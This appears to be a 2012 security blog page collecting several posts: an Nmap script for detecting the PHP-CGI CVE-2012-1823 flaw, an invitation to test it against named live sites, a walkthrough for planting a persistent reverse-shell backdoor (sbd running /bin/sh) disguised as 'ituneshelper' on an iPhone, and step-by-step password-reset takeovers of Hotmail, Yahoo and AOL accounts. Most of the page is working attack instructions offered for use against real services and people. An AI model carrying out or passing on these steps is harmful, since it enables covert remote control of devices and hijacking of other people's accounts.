NMAP Script - NSE for detecting vulnerable PHP-CGI setups (CVE2012-1823)

Here is my script for detecting vulnerable PHP-CGI setups (CVE2012-1823). This is a pretty scary vuln as it affects a lot of installations. Here is the full advisory: http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ I'm going to look more into it to write a reliable exploitation script too. So far it seems the -r flag is not available in all the setups and we will need to exploit via RFI to be 100% accurate.

Cheers.

-- @usage
-- nmap -sV --script http-vuln-cve2012-1823 <target>

-- nmap -p80 --script http-vuln-cve2012-1823 --script-args http-vuln-cve2012-1823.uri=/test.php <target>

-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-vuln-cve2012-1823:
-- |   VULNERABLE:
-- |   PHP-CGI Remote code execution and source code disclosure
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:2012-1823
-- |     Description:
-- |       According to PHP's website, "PHP is a widely-used general-purpose

-- | scripting language that is especially suited for Web development and

-- |       can be embedded into HTML." When PHP is used in a CGI-based setup

-- | (such as Apache's mod_cgid), the php-cgi receives a processed query -- | string parameter as command line arguments which allows command-line -- | switches, such as -s, -d or -c to be passed to the php-cgi binary, -- | which can be exploited to disclose source code and obtain arbitrary

-- |       code execution.
-- |     Disclosure date: 2012-05-3
-- |     Extra information:
-- |       Proof of Concept:/index.php?-s
-- |     References:
-- |       http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
-- |       http://cve.mitre.org/cgi-bin/cvename.cgi?name=2012-1823
-- |_      http://ompldr.org/vZGxxaQ
--
-- @args http-vuln-cve2012-1823.uri URI. Default: /index.php

--
Paulino Calderón Pale
Website: http://calderonpale.com
Twitter: http://twitter.com/calderpwn


Download : http://seclists.org/nmap-dev/2012/q2/att-239/http-vuln-cve2012-1823.nse

Source: http://seclists.org/nmap-dev/2012/q2/239

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Interesting Public Vulnerabilities (2012-05-04)

Drupal Core 7.x Denial Of Service / Access Bypass 
http://packetstormsecurity.org/files/112437
Tor Proxy Bypass Via Firefox 
http://packetstormsecurity.org/files/112439
Joomla 2.5.4 Cross Site Scripting 
http://packetstormsecurity.org/files/112451
PHP Vulnerability Source Code Leak And Remote Code Execution
http://www.php.net/archive/2012.php#id2012-05-03-1
https://bugs.php.net/bug.php?id=61910


Try it :)

https://www.facebook.com/?-s
http://help.station.sony.com/cgi-bin/soe.cfg/php/enduser/live.php?-s
 

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Permanent Reverse Backdoor for IPhone / IPad By CoreSec

If you want to see the full detail, please go to the Source.

    sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-128-CBC + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. Only TCP/IP communication is supported. Source code and binaries are distributed under the GNU General Public License.

    Download: http://packetstormsecurity.org/files/download/34401/sbd-1.36.tar.gz

1.  In the Jailbreak iPhone, install iphone-gcc
 - apt-get install iphone-gcc

2. Download sbd backdoor.
 - wget http://packetstormsecurity.org/files/download/34401/sbd-1.36.tar.gz
 - tar -xzvf sbd-1.36.tar.gz

3. Edit sbd.h, with your environment

4. Compile it.
 - make
 - make darwin


5. Config the RunAtLoad using LaunchDaemons -> For permanent access
 - cp sbd /usr/bin/ituneshelper
 - cd /Library/LaunchDaemons/
 - cat << EOF >> com.ituneshelper.start.plist


6. Testing it
 Host
 - ./sbd -l -p 443 -k password
 Server
 - ./sbd -r 10 -q -e /bin/sh -c on -k password -D on 192.168.200.22 443

 7. Try to transfer file
 - sbd -l -p 12345 -k password > output.file
 - cat /.../.../input.file | ./sbd -k password 192.168.200.22 12345

8. To uninstall the backdoor
 - rm -rf com.ituneshelper.start.plist
 - rm -rf /usr/bin/ituneshelper

Source: http://www.coresec.org/2012/04/24/permanent-reverse-backdoor-for-iphone-ipad/

 

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

Hotmail, AOL and Yahoo Password Reset 0Day Vulnerabilities

1.) Hotmail :
Step 1. Go to this page https://maccount.live.com/ac/resetpwdmain.aspx .
Step 2. Enter the Target Email and enter the 6 characters you see.
Step 3. Start Tamper Data
Step 4. Delete Element "SendEmail_ContinueCmd"
Step 5. change Element "__V_previousForm" to "ResetOptionForm"
Step 6. Change Element "__viewstate" to "%2FwEXAQUDX19QDwUPTmV3UGFzc3dvcmRGb3JtZMw%2BEPFW%2Fak6gMIVsxSlDMZxkMkI"
Step 7. Click O.K and Type THe new Password
Step 8. sTart TamperDaTa and Add Element "__V_SecretAnswerProof" Proof not constant Like the old Exploit "++++" You need new Proof Every Time


2.) Yahoo
Step 1. Go to this page https://edit.yahoo.com/forgot .
Step 2. EnTer the Target Email . and Enter the 6 characters you see .
Step 3. Start Tamper Data Delete
Step 4. change Element "Stage" to "fe200"
Step 5. Click O.K and Type The new Password
Step 6. Start Tamper Data All in Element Z
Step 7.done

3.) AOL:
Step 1. Go to Reset Page
Step 2. EnTer the Target Email . and Enter the characters you see .
Step 3. Start Tamper Data
Step 4. change Element "action" to "pwdReset"
Step 5. change Element "isSiteStateEncoded" to "false"
Step 6. Click O.K and Type THe new Password
Step 7. Start TamperDaTa All in Element rndNO
Step 8. done

Source: http://thehackernews.com/2012/04/yet-another-hotmail-aol-and-yahoo.html

If you like my blog, Please Donate Me

One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00